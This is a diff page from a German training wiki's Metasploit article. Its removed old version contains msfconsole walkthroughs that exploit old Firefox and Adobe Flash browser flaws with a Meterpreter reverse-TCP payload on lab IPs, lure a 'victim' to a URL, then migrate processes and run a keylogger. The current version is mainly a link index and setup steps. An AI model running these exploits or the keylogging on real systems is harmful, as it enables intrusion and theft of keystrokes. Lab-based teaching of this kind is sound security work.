Metasploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(76 dazwischenliegende Versionen von 7 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
 +
=Fundamental=
 +
*[[Grundlegendes]]
 +
*[https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/ Aufbau]
  
=Links=
+
=preparation=
*http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
+
==Postgresql enable and start==
*http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
+
*systemctl start postgresql
*https://jonathansblog.co.uk/metasploit-tutorial-for-beginners
+
*systemctl enable postgresql
*https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
 
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
 
*http://www.metasploit.com/
 
=Setup Opfer=
 
Winxp Service pack 3
 
Firefox 3.5
 
  
=Setup Hacker=
+
==Init Metasploit first time==
Kali Linux
+
*msfdb init
ip: 192.168.242.53
 
  
=vorgehen=
+
==Apache enablen und start==
starte metasploit
+
*systemctl start apache2
msfconsole
+
*systemctl enable  apache2
 +
=Einstieg=
 +
*[[metasploit Datenbank]]
 +
*[[metasploit Datenbank Handling]]
 +
*[[metasploit Übersicht]]
 +
*[[msfvenom]]
  
use exploit/multi/browser/firefox_escape_retval
+
= Beispiele =
set payload windows/meterpreter/reverse_tcp
+
* [[Metasploit handling]]
set lhost 192.168.242.53 (lokaler Host)
+
* [[Metasploit trojaner windows]]
set svrhost 192.168.242.53 (HTTP-Server IP)
+
* [[Metasploit trojaner linux]]
set svrport 8888 (HTTP-Server Port)
+
* [[Metasploit script]]
set lport 4444 (lokaler Port)
+
* [[Armitage]]
set uripath /hack (optional)
+
* [[Metasploit Portscanning]]
exploit
+
* [[Metasploit Schnellstart]]
  
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
+
* [[Metasploit dir_scanner]]
wenn wir meterpreter > sehen hat der exploit funktioniert
+
* [[Metasploit trojaner android]]
 +
* [[Metasploit trojaner android fatrat]]
 +
* [[Metasploit browser Exlpoit]]
 +
* [[Metasploit VSFTP 2.3.4]]
  
session - i 1 (in die session gehen)
+
=Weitere Beispiele=
sessions -h (zeigt optionen)
 
ps (zeigt prozesse)
 
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
 
getpid (zeigt momentanen prozess)
 
keyscan_start (startet den keyloger)
 
keyscan_dump (zeigt aufzeichnungen)
 
keyscan_stop (stopt keyloger)
 
  
=Win7 32bit Exploit=
+
*[[Metasploit Basis Aufgaben]]
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html
+
*[[Metasploit win2k8 Aufgaben]]
  
 +
*[[metasploit weitere Beispiele]]
  
* Setup Opfer
+
=misc=
 +
*[[metasploit-exploitdb]]
 +
*[[metasploit-todo]]
 +
*[[Metasploit als Pivot Host]]
  
win732 bit
+
=Links=
 
+
*[https://jonathansblog.co.uk/metasploit-tutorial-for-beginners Metasploit for beginners]
adobeflash 17.0.0.134
+
*https://github.com/rapid7/metasploit-framework/
 
+
*https://netsec.ws/?p=331
firefox
+
*http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
 
+
*http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
TeamViewer ID 597 708 786
+
*https://jonathansblog.co.uk/metasploit-tutorial-for-beginners
 
+
*https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
==Hackersystem==
+
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
kali linux
+
*http://www.metasploit.com/
 
+
*http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/
ip 192.168.244.50
 
 
 
===auf der konsole===
 
metasploit konsole starten
 
*msfconsole
 
auswahl des exploits
 
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
 
auswahl der schadsoftware
 
*set payload windows/meterpreter/reverse_tcp
 
setzen des localhost
 
*set lhost 192.168.244.50
 
setzen des webservers
 
*set srvhost 192.168.244.50
 
pfad zum hack
 
*set uripath /hack
 
ausführen des exploits
 
*exploit
 
 
 
=auf dem opfer=
 
*gehen mit win7 auf http://192.168.244.150:8080/hack
 
=auf dem hackersystem=
 
==commandos==
 
sessions -l (listet die sessions)
 
sessions -i 1 (in die session gehen)
 
sessions -h (zeigt optionen)
 
ps (zeigt prozesse)
 
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
 
getpid (zeigt momentanen prozess)
 
keyscan_start (startet den keyloger)
 
keyscan_dump (zeigt aufzeichnungen)
 
keyscan_stop (stopt keyloger)
 
 
 
==vorgehnsweise==
 
session betreten
 
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
 
ps listing
 
*meterpreter > ps
 

Aktuelle Version vom 22. Mai 2025, 09:33 Uhr

Fundamental

preparation

Postgresql enable and start

  • systemctl start postgresql
  • systemctl enable postgresql

Init Metasploit first time

  • msfdb init

Apache enablen und start

  • systemctl start apache2
  • systemctl enable apache2

Einstieg

Beispiele

Weitere Beispiele

misc

Links